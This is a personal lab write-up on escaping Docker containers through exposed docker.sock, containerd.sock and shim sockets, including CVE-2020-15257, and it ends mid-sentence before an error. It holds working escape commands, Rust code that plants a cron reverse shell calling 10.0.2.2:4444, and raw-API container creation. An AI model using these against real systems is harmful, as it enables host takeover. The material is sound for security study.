Docker Escape Notes

The plan is to use a VM, so I built a rootfs with buildroot, plus a stock kernel image. buildroot can select docker-cli and docker-engine directly (the docker compose checksum seemed to be wrong; after tweaking it, it built fine, and it's just a VM anyway), and it pulls in the dependencies automatically. The kernel can be the one it provides, or you can compile your own or download another. Here I start from buildroot/board/qemu/x86_64/linux.config and modify it.

Docker needs network access to build images, so add the -device virtio-net-pci,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222-:22 options to qemu. Set the DHCP network interface name (BR2_SYSTEM_DHCP) to eth0, so the generated inittab contains a dhcp command and the VM acquires an IP automatically. Also select ca-certificates, otherwise https won't work. Since runc currently lacks pivot_root support on a ramfs (see rootfs: make pivot_root(2) dance handle initramfs case by cyphar · Pull Request #4434 · opencontainers/runc), the filesystem here is btrfs (my machine's kernel lacks ext4, which makes mounting and editing the image inconvenient). Also, qemu's tty (or whatever it is) doesn't wrap lines once the output exceeds the screen width, which makes reading output hard, so I installed dropbear to ssh in (hence the port 22 forwarding above).

The final directory layout:

text

 .
├──  buildroot
├──  playground
├──  disk.qcow2
└──  Makefile

The Makefile:

makefile

IMAGES_DIR := $(shell pwd)/buildroot/output/images
ROOT_DIR := $(shell pwd)/playground
DISK_RAW := $(shell pwd)/disk.raw
DISK := $(shell pwd)/disk.qcow2

.PHONY: all clean world menuconfig linux-menuconfig disk run

all: world

linux-menuconfig:
	$(MAKE) -C buildroot linux-menuconfig
  # TODO: auto detect config file and copy it to buildroot/.linux.config
	cp ./buildroot/output/build/linux-6.12.10/.config ./buildroot/.linux.config

disk:
	rm -f $(DISK)
	qemu-img create -f raw $(DISK_RAW) 1G
	doas losetup /dev/loop1 $(DISK_RAW)
	doas mkdir -p ./mnt/disk ./mnt/rootfs
	doas mount -o loop $(IMAGES_DIR)/rootfs.btrfs ./mnt/rootfs/
	doas mkfs.btrfs /dev/loop1
	doas mount /dev/loop1 ./mnt/disk
	doas rsync -a ./mnt/rootfs/ ./mnt/disk/
	cd ./mnt/disk && \
		doas sed -i '$$a\root   /root    9p    trans=virtio,version=9p2000.L,rw    0    0' ./etc/fstab && \
		echo "flag{escaped}" | doas tee ./flag && \
		cd ..
	doas umount ./mnt/disk
	doas umount ./mnt/rootfs
	doas losetup -d /dev/loop1
	doas rm -r ./mnt
	qemu-img convert -f raw -O qcow2 $(DISK_RAW) $(DISK)
	rm $(DISK_RAW)

world:
	$(MAKE) -C buildroot
	$(MAKE) disk

menuconfig:
	$(MAKE) -C buildroot menuconfig

clean:
	$(MAKE) -C buildroot clean

run:
	qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -enable-kvm \
    -kernel $(IMAGES_DIR)/bzImage \
    -append "root=/dev/vda rw console=ttyS0 loglevel=3 oops=panic panic=-1" \
    -nographic \
    -no-reboot \
    -device virtio-net-pci,netdev=net0 \
    -netdev user,id=net0,hostfwd=tcp::2222-:22 \
    -virtfs local,path=$(ROOT_DIR),mount_tag=root,security_model=mapped,id=root \
    -drive file=$(DISK),format=qcow2,if=virtio,id=rootfs,index=0,media=disk

Containers have a split architecture: the docker command is only a frontend; the daemons that actually manage containers are dockerd and containerd. The architecture is shown below:

mermaid

graph TD
    A[Docker CLI] --> B["Docker Engine
                        (dockerd)"]
    B --> C[containerd]
    C --> D[containerd-shim]
    D --> E[runC]
    C --> F[containerd-shim]
    F --> G[runC]
    C --> H[containerd-shim]
    H --> I[runC]

What dockerd actually calls is containerd's gRPC API; containerd manages the container lifecycle, images, storage, networking, and so on, and is the real core of the container stack. containerd-shim is the vehicle that runs a container: every container start spawns one containerd-shim process, which is responsible for calling runC's API to actually create and run the container.

The flow of docker run:

  1. The docker client sends the command to dockerd over gRPC
  2. dockerd checks whether the image already exists locally; if it does, it continues and asks the host OS to create the container
  3. A containerd-shim process is started, and the namespaces and cgroups are created
  4. containerd-shim takes three arguments (the container id, the bundle directory, and the runtime binary runC) and uses them to call runC's API
  5. runC extracts the image, generates the container config, and starts the container

mermaid

sequenceDiagram
    participant DOCKERD
    participant CONTAINERD
    participant CONTAINERD_SHIM
    participant RUNC

    DOCKERD->>CONTAINERD: gRPC request
    CONTAINERD->>CONTAINERD_SHIM: start/exec via the shim
    CONTAINERD_SHIM->>RUNC: runc create/start/exec
    RUNC-->>CONTAINERD_SHIM: 
    CONTAINERD_SHIM-->>CONTAINERD: 
    CONTAINERD-->>DOCKERD: gRPC response
    CONTAINERD->>RUNC: runc interaction (state, top, etc.)
    RUNC-->>CONTAINERD: (no idea why leaving this blank errors out)

dockerd binds the unix socket /var/run/docker.sock by default and communicates over it. In scenarios where docker is managed from inside a container, this socket may be mapped in, which lets you drive the host's container management from within the container.

Write a Dockerfile and a compose file like the following:

dockerfile

FROM alpine:latest
RUN apk add --no-cache docker curlie

yaml

services:
  app:
    build: .
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock

Then start the container, get inside, and use the docker command as usual to operate the host's docker daemon. The escape is therefore to start a new container with the host's root directory mapped in, and grab the flag from there.

text

/ # docker run -it --rm -v /:/host/ alpine ash
/ # ls
bin    etc    host   media  opt    root   sbin   sys    usr
dev    home   lib    mnt    proc   run    srv    tmp    var
/ # cd /host
/host # ls
bin           flag          linuxrc       proc          sys
crond.reboot  init          media         root          tmp
dev           lib           mnt           run           usr
etc           lib64         opt           sbin          var
/host # cat flag
flag{escaped}

This isn't really an "escape" yet, though: the ns and cgroup isolation still hold, and the caps restrictions still apply. But since we can run docker commands directly, the new container can be started with settings that make it use the host's namespaces and cgroups, configure security mechanisms such as apparmor and seccomp, grant extra caps, and so on. For example:

text

/ # docker run -it --rm -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host alpine ash
/ # ls
bin    etc    host   media  opt    root   sbin   sys    usr
dev    home   lib    mnt    proc   run    srv    tmp    var
/ # ps aux
PID   USER     TIME  COMMAND
    1 root      0:00 init
    2 root      0:00 [kthreadd]
    3 root      0:00 [pool_workqueue_]
    4 root      0:00 [kworker/R-rcu_g]
    5 root      0:00 [kworker/R-sync_]
    6 root      0:00 [kworker/R-slub_]
    7 root      0:00 [kworker/R-netns]
    10 root      0:00 [kworker/0:0H-ev]
    12 root      0:00 [kworker/R-mm_pe]
    13 root      0:00 [rcu_tasks_kthre]
    14 root      0:00 [ksoftirqd/0]
    15 root      0:00 [rcu_preempt]
    16 root      0:00 [rcu_exp_par_gp_]
    17 root      0:00 [rcu_exp_gp_kthr]
    18 root      0:00 [migration/0]
    19 root      0:00 [cpuhp/0]
    20 root      0:00 [kdevtmpfs]
    21 root      0:00 [kworker/R-inet_]
    22 root      0:00 [kauditd]
    23 root      0:00 [kworker/u4:1-ev]
    24 root      0:00 [oom_reaper]
    25 root      0:00 [kworker/R-write]
    26 root      0:00 [kcompactd0]
    27 root      0:00 [kworker/R-kbloc]
    28 root      0:00 [irq/9-acpi]
    29 root      0:00 [kworker/R-ata_s]
    30 root      0:00 [kworker/R-md]
    31 root      0:00 [kworker/R-md_bi]
    33 root      0:00 [kworker/0:1H-kb]
    34 root      0:00 [kworker/R-rpcio]
    35 root      0:00 [kworker/R-xprti]
    36 root      0:00 [kworker/R-cfg80]
    38 root      0:00 [kswapd0]
    39 root      0:00 [kworker/R-nfsio]
    40 root      0:00 [kworker/R-acpi_]
    41 root      0:00 [scsi_eh_0]
    42 root      0:00 [kworker/R-scsi_]
    43 root      0:00 [scsi_eh_1]
    44 root      0:00 [kworker/R-scsi_]
    46 root      0:00 [kworker/R-mld]
    47 root      0:00 [kworker/R-ipv6_]
    57 root      0:00 [jbd2/vda-8]
    58 root      0:00 [kworker/R-ext4-]
    73 root      0:00 /sbin/syslogd -n
    77 root      0:00 /sbin/klogd -n
    165 root      0:00 udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run
    170 root      0:00 /usr/sbin/crond -f
    174 root      0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
    176 root      0:22 /usr/bin/dockerd --pidfile /var/run/dockerd.pid
    177 root      0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
    187 root      0:05 containerd --config /var/run/docker/containerd/containerd.
    924 root      0:00 -sh
    1460 root      0:00 [kworker/0:0-eve]
    2012 root      0:00 [kworker/u4:0-ev]
    2634 root      0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ec478
    2667 root      0:00 /bin/ash
    2696 root      0:00 docker compose run app
    2708 root      0:01 /usr/lib/docker/cli-plugins/docker-compose compose run app
    2737 root      0:02 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c186f
    2771 root      0:00 /bin/ash
    2891 root      0:00 [kworker/u4:2-ev]
    2908 root      0:00 [kworker/0:1-eve]
    3047 root      0:00 [kworker/0:2-eve]
    3093 root      0:00 docker run -it --rm -v /:/host/ --cap-add=ALL --security-o
    3112 root      0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 795b7
    3144 root      0:00 ash
    3168 root      0:00 ps aux

This is effectively full control of the host (with --pid=host and full caps you could even nsenter into PID 1's namespaces, e.g. nsenter -t 1 -m -u -n -i sh).

(Though the even simpler route is to write a cron job that pops a reverse shell, haha. A sketch of that follows.)
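
A minimal sketch of the cron route, assuming the host runs BusyBox crond (as in this VM) with its spool at /var/spool/cron/crontabs; the spool path, the callback address, and nc -e availability all depend on the build, so treat them as placeholders:

rust

use std::fs::OpenOptions;
use std::io::Write;

fn main() -> std::io::Result<()> {
    // With the host root bind-mounted at /host, appending one cron line is
    // enough; crond then runs it on the host within a minute.
    let mut f = OpenOptions::new()
        .create(true)
        .append(true)
        .open("/host/var/spool/cron/crontabs/root")?;
    // Placeholder reverse-shell callback (10.0.2.2 is qemu's user-net host);
    // requires a busybox nc built with -e support.
    writeln!(f, "* * * * * nc 10.0.2.2 4444 -e /bin/sh")?;
    Ok(())
}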

If the mapped-in socket isn't at the default location, specify it with -H unix:///path/to/docker.sock. (If even the file name was changed, it seems you can only try the files one by one.)
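
Trying them one by one is easy to script. A minimal sketch, assuming it's enough to walk a few likely directories (my guesses; extend as needed) and treat any unix socket that answers Docker's GET /_ping endpoint as a hit:

rust

use std::io::{Read, Write};
use std::os::unix::fs::FileTypeExt;
use std::os::unix::net::UnixStream;
use std::time::Duration;

// Speak just enough HTTP over the socket to hit dockerd's ping endpoint.
fn is_docker_socket(path: &str) -> bool {
    let Ok(mut s) = UnixStream::connect(path) else { return false };
    // Avoid hanging forever on sockets that never answer.
    let _ = s.set_read_timeout(Some(Duration::from_secs(2)));
    let req = "GET /_ping HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n";
    if s.write_all(req.as_bytes()).is_err() { return false; }
    let mut resp = String::new();
    let _ = s.read_to_string(&mut resp);
    // dockerd identifies itself in the Server header (see the curlie output below).
    resp.contains("Server: Docker")
}

fn main() {
    for dir in ["/run", "/var/run", "/tmp"] {
        let Ok(entries) = std::fs::read_dir(dir) else { continue };
        for entry in entries.flatten() {
            let is_sock = entry.file_type().map(|t| t.is_socket()).unwrap_or(false);
            if !is_sock { continue; }
            let path = entry.path().to_string_lossy().into_owned();
            if is_docker_socket(&path) {
                println!("docker socket: {path}");
            }
        }
    }
}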

If there is no docker binary inside the container, that's fine too; the socket can be spoken to by other means, e.g. the HTTP API directly.

text

/ # curlie --unix-socket /var/run/docker.sock GET http://localhost/containers/json
[
    {
        "Id": "6df5480c6d2ecd5ba05eee50e026e1d199560d30453a534e3b447a1ebc752bf6",
        "Names": [
            "/socket-app-run-ab55dc606bb9"
        ],
        "Image": "alpine:latest",
        "ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
        "Command": "/bin/ash",
        "Created": 1736324068,
        "Ports": [

        ],
        "Labels": {
            "com.docker.compose.config-hash": "1787a2ee9fcd2a21d4a5c22008bb8da1d54c
            "com.docker.compose.container-number": "1",
            "com.docker.compose.depends_on": "",
            "com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
            "com.docker.compose.oneoff": "True",
            "com.docker.compose.project": "socket",
            "com.docker.compose.project.config_files": "/root/socket/docker-compose
            "com.docker.compose.project.working_dir": "/root/socket",
            "com.docker.compose.service": "app",
            "com.docker.compose.slug": "ab55dc606bb97468ca39af4bcfbabe3b54a63395d13
            "com.docker.compose.version": "2.29.7"
        },
        "State": "running",
        "Status": "Up About a minute",
        "HostConfig": {
            "NetworkMode": "socket_default"
        },
        "NetworkSettings": {
            "Networks": {
                "socket_default": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "MacAddress": "02:42:ac:12:00:03",
                    "DriverOpts": null,
                    "NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
                    "EndpointID": "afa93e331bb45250fe7b5ef8931914ed2096a2c8a68c334e
                    "Gateway": "172.18.0.1",
                    "IPAddress": "172.18.0.3",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "DNSNames": null
                }
            }
        },
        "Mounts": [
            {
                "Type": "bind",
                "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock",
                "Mode": "rw",
                "RW": true,
                "Propagation": "rprivate"
            }
        ]
    },
    {
        "Id": "0d217c3631c47832c8391337670d1e0915057ea2ca910de3402620c2e2acbc26",
        "Names": [
            "/socket-app-1"
        ],
        "Image": "alpine:latest",
        "ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
        "Command": "/bin/ash",
        "Created": 1736324010,
        "Ports": [

        ],
        "Labels": {
            "com.docker.compose.config-hash": "07f59ca7fad1bdad505feb0e11fdd72aa356
            "com.docker.compose.container-number": "1",
            "com.docker.compose.depends_on": "",
            "com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
            "com.docker.compose.oneoff": "False",
            "com.docker.compose.project": "socket",
            "com.docker.compose.project.config_files": "/root/socket/docker-compose
            "com.docker.compose.project.working_dir": "/root/socket",
            "com.docker.compose.service": "app",
            "com.docker.compose.version": "2.29.7"
        },
        "State": "running",
        "Status": "Up About a minute",
        "HostConfig": {
            "NetworkMode": "socket_default"
        },
        "NetworkSettings": {
            "Networks": {
                "socket_default": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "MacAddress": "02:42:ac:12:00:02",
                    "DriverOpts": null,
                    "NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
                    "EndpointID": "fdda29be5bab686b462f722fa82413c9a8aafb8457c2616c
                    "Gateway": "172.18.0.1",
                    "IPAddress": "172.18.0.2",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "DNSNames": null
                }
            }
        },
        "Mounts": [
            {
                "Type": "bind",
                "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock",
                "Mode": "rw",
                "RW": true,
                "Propagation": "rprivate"
            }
        ]
    }
]
HTTP/1.1 200 OK
Api-Version: 1.47
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/27.3.1 (linux)
Date: Wed, 08 Jan 2025 08:16:16 GMT
Transfer-Encoding: chunked

More operations can be looked up in the API docs; I didn't bother testing how to start containers this way, but a rough sketch follows.
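
For completeness, the same escape without any docker client looks roughly like this: POST /containers/create with the host root bind-mounted, then POST /containers/{id}/start. A dependency-free sketch speaking raw HTTP/1.1 over the socket (the container name pwn, the cat /host/flag payload, and the crude Id extraction are all just for illustration):

rust

use std::io::{Read, Write};
use std::os::unix::net::UnixStream;

// One throwaway HTTP/1.1 request over the docker socket; returns the raw response.
fn docker_http(method: &str, path: &str, body: &str) -> std::io::Result<String> {
    let mut s = UnixStream::connect("/var/run/docker.sock")?;
    let req = format!(
        "{method} {path} HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/json\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{body}",
        body.len()
    );
    s.write_all(req.as_bytes())?;
    let mut resp = String::new();
    s.read_to_string(&mut resp)?;
    Ok(resp)
}

fn main() -> std::io::Result<()> {
    // Create a container with the host root bind-mounted at /host.
    let create = docker_http(
        "POST",
        "/containers/create?name=pwn",
        r#"{"Image":"alpine:latest","Cmd":["cat","/host/flag"],"HostConfig":{"Binds":["/:/host"]}}"#,
    )?;
    println!("{create}");
    // Crude Id extraction, to stay dependency-free.
    let id = create
        .split("\"Id\":\"")
        .nth(1)
        .and_then(|rest| rest.split('"').next())
        .expect("no Id in create response");
    // Start it; the flag then shows up via GET /containers/{id}/logs?stdout=true.
    println!("{}", docker_http("POST", &format!("/containers/{id}/start"), "")?);
    Ok(())
}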

A systemd-managed dockerd can additionally be configured (it is not the default) to expose the API on TCP, conventionally port 2375 (plaintext) and 2376 (TLS), alongside docker.sock. If the container can reach the host network (--net=host), or the host exposes the port to the public internet, the daemon can be driven through it; with the docker CLI it works like above, just connect with -H tcp://host:2376.

If containerd.sock is what got mapped in, you can also talk to it directly to create containers and escape. You can use containerd's CLI ctr, other tools such as the friendlier nerdctl, or even hand-rolled gRPC calls.

The compose file:

yml

services:
  containerd:
    build: .
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    cap_add:
      - SYS_ADMIN
    network_mode: host
    volumes:
      - /var/run/docker/containerd/containerd.sock:/var/run/docker/containerd/containerd.sock
      - /var/lib/docker/containerd:/var/lib/docker/containerd

However, docker doesn't use containerd to store containers (see the reference), so nerdctl can't see the images. Containers are still visible, though in a separate namespace:

text

/ # nerdctl -a /var/run/docker/containerd/containerd.sock namespace ls
NAME       CONTAINERS    IMAGES    VOLUMES    LABELS
default    0             0         0
moby       1             0         0
/ # nerdctl -a /var/run/docker/containerd/containerd.sock -n moby ps
CONTAINER ID    IMAGE    COMMAND       CREATED           STATUS    PORTS    NAMES
50ed2f6cabbf             "/bin/ash"    16 minutes ago    Up
/ # docker ps
CONTAINER ID   IMAGE        COMMAND      CREATED          STATUS          PORTS     NAMES
50ed2f6cabbf   socket-app   "/bin/ash"   16 minutes ago   Up 16 minutes             socket-app-run-5e4ecb87c5a0

Pulling an image succeeds, but creating a container still fails:

text

FATA[0000] failed to mount {Type:bind Source:/var/lib/docker/containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/4/fs Target: Options:[ro rbind]} on "/tmp/initialC2772891160": operation not permitted

This needs mount permission (the SYS_ADMIN capability), and /var/lib/docker/containerd/ must also be mapped into the container. (I don't get why the host's containerd doesn't look the path up on the host side.)

And then another problem:

text

FATA[0000] failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: failed to fulfil mount request: open /var/lib/nerdctl/55e780ce/containers/default/d832666b196df5a9dd64bd38453d590aa5e7b7464249e7092a41d665f55584b9/resolv.conf: no such file or directory: unknown

Switching to ctr, create the container and start it:

text

/ # ctr -a /var/run/docker/containerd/containerd.sock container create --runtime io.containerd.runc.v2 --mount type=bind,source=/,destination=/host docker.io/library/alpine:latest test /bin/ash
/ # ctr -a /var/run/docker/containerd/containerd.sock task start test
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error jailing process inside rootfs: pivot_root .: invalid argument: unknown

pivot_root fails for the same reason as with docker: it's a ramfs. Start it with the --no-pivot flag:

text

/ # ctr -a /var/run/docker/containerd/containerd.sock task start --no-pivot test
ctr: failed to create shim task: failed to open stdin fifo /run/containerd/fifo/533476447/test-stdin: stat /run/containerd/fifo/533476447/test-stdin: no such file or directory: unknown

Now the fifo can't be handled either. I did find a writeup that got around this problem:

quote

Next step was to try and create a privileged container. I stumbled a little, with an error about docker-containerd-ctr not being able to create a fifo directory. This could have been because of the container-in-container situation, my initial shell being TTY-less or Bitbucket’s hijack of stdio. This was an easy issue to solve though, simply by passing the --null-io parameter the error went away. Because I couldn’t create an interactive container, I had to go with a reverse shell. The easiest here was to create a shell script, that got mounted into the container and then executed.

That is, don't interact over stdin; pop a reverse shell instead.

And it broke again: the mount is accepted at create time, but task start errors out, and I don't know how to solve this one.

text

ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error mounting "/" to rootfs at "/host": mount src=/, dst=/host, dstFd=/proc/thread-self/fd/8: no such device: unknown

(I'm at a loss; on a fresh machine running only containerd I get the same error. The closest issue I can find is this one, but they say it isn't a containerd or runc problem.)

Taking a break from this for now; being able to control other containers is also an escape (surely).

There is a related CVE: CVE-2020-15257, containerd-shim API exposed to host network containers · Advisory · containerd/containerd. In older containerd versions, a container running with --net host shares the network namespaces with the host, and access to the abstract unix socket was not restricted; abstract sockets are not isolated by mount namespaces. The official fix replaced the abstract socket with a filesystem socket, so the socket is subject to mount namespace isolation.
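
This also makes discovery straightforward: abstract sockets show up in /proc/net/unix with a leading @, so a container sharing the host's network namespace can simply enumerate them. A small sketch (the containerd filter is my guess at the vulnerable shim socket names, which looked something like @/containerd-shim/moby/<id>/shim.sock):

rust

use std::fs;

fn main() {
    // Abstract unix sockets live in the network namespace, not the mount
    // namespace, so with --net host the container sees the host's sockets.
    let data = fs::read_to_string("/proc/net/unix").expect("read /proc/net/unix");
    for line in data.lines().skip(1) {
        // Columns: Num RefCount Protocol Flags Type St Inode Path
        if let Some(path) = line.split_whitespace().nth(7) {
            if path.starts_with('@') && path.contains("containerd") {
                println!("{path}");
            }
        }
    }
}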

Here I reproduce it by mapping the containerd-shim socket into the container; the compose file:

yml

services:
  shim:
    image: alpine:latest
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    volumes:
      - /var/run/containerd/s/:/var/run/containerd/s/

First we need to learn how to talk to containerd-shim. Communication with the shim uses the Task service over ttrpc (a lightweight gRPC-like protocol); the API is:

proto

service Task {
	rpc State(StateRequest) returns (StateResponse);
	rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
	rpc Start(StartRequest) returns (StartResponse);
	rpc Delete(DeleteRequest) returns (DeleteResponse);
	rpc Pids(PidsRequest) returns (PidsResponse);
	rpc Pause(PauseRequest) returns (google.protobuf.Empty);
	rpc Resume(ResumeRequest) returns (google.protobuf.Empty);
	rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
	rpc Kill(KillRequest) returns (google.protobuf.Empty);
	rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
	rpc ResizePty(ResizePtyRequest) returns (google.protobuf.Empty);
	rpc CloseIO(CloseIORequest) returns (google.protobuf.Empty);
	rpc Update(UpdateTaskRequest) returns (google.protobuf.Empty);
	rpc Wait(WaitRequest) returns (WaitResponse);
	rpc Stats(StatsRequest) returns (StatsResponse);
	rpc Connect(ConnectRequest) returns (ConnectResponse);
	rpc Shutdown(ShutdownRequest) returns (google.protobuf.Empty);
}

Pids is a good call to test with. The official client API is in Go; I can't write Go, so this is done in Rust (with the containerd-shim-protos crate).

PidsRequest takes an id, which here is the container id (found by experimenting; presumably that's just how docker organizes things, and starting containers yourself with ctr should allow different ids). Inside the container it can be read directly from /proc/self/cgroup, for example:

text

/ # cat /proc/self/cgroup
13:debug:/
12:misc:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
11:rdma:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
10:pids:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
9:hugetlb:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
8:net_prio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
7:perf_event:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
6:net_cls:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
5:freezer:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
4:devices:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
3:blkio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
2:cpuacct:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
1:cpu:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071

rust

use std::fs;

use containerd_shim_protos::{
    api::PidsRequest,
    ttrpc::context,
    Client, TaskClient,
};

fn find_shim_sockets() -> Vec<String> {
    fs::read_dir("/run/containerd/s/")
        .expect("Failed to read /run/containerd/s/")
        .filter_map(|entry| entry.ok())
        .map(|entry| entry.path().to_string_lossy().to_string())
        .collect()
}

fn get_container_id() -> Result<String, std::io::Error> {
    let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
    for line in cgroup.lines() {
        if line.contains("docker") {
            let parts: Vec<&str> = line.split('/').collect();
            return parts
                .last()
                .map(|s| s.to_string())
                .ok_or(std::io::Error::new(
                    std::io::ErrorKind::NotFound, line));
        }
    }
    Err(std::io::Error::new(std::io::ErrorKind::NotFound, cgroup))
}

fn main() {
    for socket in find_shim_sockets() {
        let sockaddr = format!("unix://{socket}");
        println!("connecting to {}", sockaddr);
        let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
        let task = TaskClient::new(client);
        println!("requesting pids for {}", socket);
        let container_id = get_container_id().expect("Failed to get container id");
        let mut pids_req = PidsRequest::new();
        pids_req.set_id(container_id);
        let pids_resp = task
            .pids(context::with_timeout(0), &pids_req)
            .expect("Failed to get pids");
        println!("pids: {:#?}", pids_resp);
    }
}

The result:

text

connecting to unix:///run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
requesting pids for /run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
pids: PidsResponse {
    processes: [
        ProcessInfo {
            pid: 682,
            info: MessageField(
                None,
            ),
            special_fields: SpecialFields {
                unknown_fields: UnknownFields {
                    fields: None,
                },
                cached_size: CachedSize {
                    size: 0,
                },
            },
        },
        ProcessInfo {
            pid: 939,
            info: MessageField(
                None,
            ),
            special_fields: SpecialFields {
                unknown_fields: UnknownFields {
                    fields: None,
                },
                cached_size: CachedSize {
                    size: 0,
                },
            },
        },
    ],
    special_fields: SpecialFields {
        unknown_fields: UnknownFields {
            fields: None,
        },
        cached_size: CachedSize {
            size: 0,
        },
    },
}

We successfully connected to the host's shim socket and communicated with it. On the host you can see that pid 682 above is the process inside docker (the ash started here), and its parent is containerd-shim:

text

# ps -o pid,ppid,args | grep -E "PID|$(ps -o pid,ppid,args | grep 682 | head -n -1 | awk '{print $2}')"
PID   PPID  COMMAND
    650     1 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071 -address /var/run/docker/containerd/containerd.sock
    682   650 /bin/ash

Next, exploitation. When running a task there are two places where host commands get executed directly: the IO can be pointed at a program, and hooks can be set to run programs (OCI hooks such as prestart are executed by the runtime outside the container).

containerd supports setting the IO to a binary, which gives a redirection-like effect; for instance, container output can be logged to a logging program such as journald. The relevant code:

go

// BinaryIO forwards container STDOUT|STDERR directly to a logging binary
func BinaryIO(binary string, args map[string]string) Creator {
	return func(_ string) (IO, error) {
		uri, err := LogURIGenerator("binary", binary, args)
		if err != nil {
			return nil, err
		}

		res := uri.String()
		return &logURI{
			config: Config{
				Stdout: res,
				Stderr: res,
			},
		}, nil
	}
}

So we can create a task and set its stdout to such a binary IO URI (binary:///path/to/program?arg=value), which executes an arbitrary command on the host, e.g. a reverse shell.

First, look at the parameters needed to create a task:

proto

message CreateTaskRequest {
	string id = 1;
	string bundle = 2;
	repeated containerd.types.Mount rootfs = 3;
	bool terminal = 4;
	string stdin = 5;
	string stdout = 6;
	string stderr = 7;
	string checkpoint = 8;
	string parent_checkpoint = 9;
	google.protobuf.Any options = 10;
}

Per OCI, id and bundle are required: the id is the one mentioned above, and the bundle is the container's config directory, following the OCI standard. Fields left empty fall back to whatever the bundle sets, and the id can actually be chosen freely. If the bundle is taken directly from the one docker set up at startup (/run/docker/containerd/daemon/io.containerd.runtime.v2.task/moby/{container_id}/config.json), the current version errors with:

text

Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: container's cgroup is not empty: 2 process(es) found", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })

It says the cgroup isn't empty, so we have to set one up ourselves. The host can access the container's filesystem, so a bundle can be written inside the container's own fs. Concretely, docker uses overlayfs by default, and /etc/mtab inside the container shows the rootfs mapping, for example:

text

overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OZM73XA67KI3RI5ZIOLNDRSAYH:/var/lib/docker/overlay2/l/CFJLUZAW4E44SPONRAFFOYETHV:/var/lib/docker/overlay2/l/UKJT4TRNQILRFI44Y4LLNH7BOK,upperdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/diff,workdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/work 0 0

overlayfs is layered; on the host, /var/lib/docker/overlay2/{overlay_id}/merged gives access to the container's rootfs. diff works too; it holds the newly added/modified files.

Take an existing container's config.json and modify it: set the container id and root path correctly, point cgroupsPath at some other path, and finally write it to e.g. /tmp/config.json inside the container; the bundle path on the host is then /var/lib/docker/overlay2/{overlay_id}/merged/tmp/.

If nothing unexpected happens, something unexpected happens. The error:

text

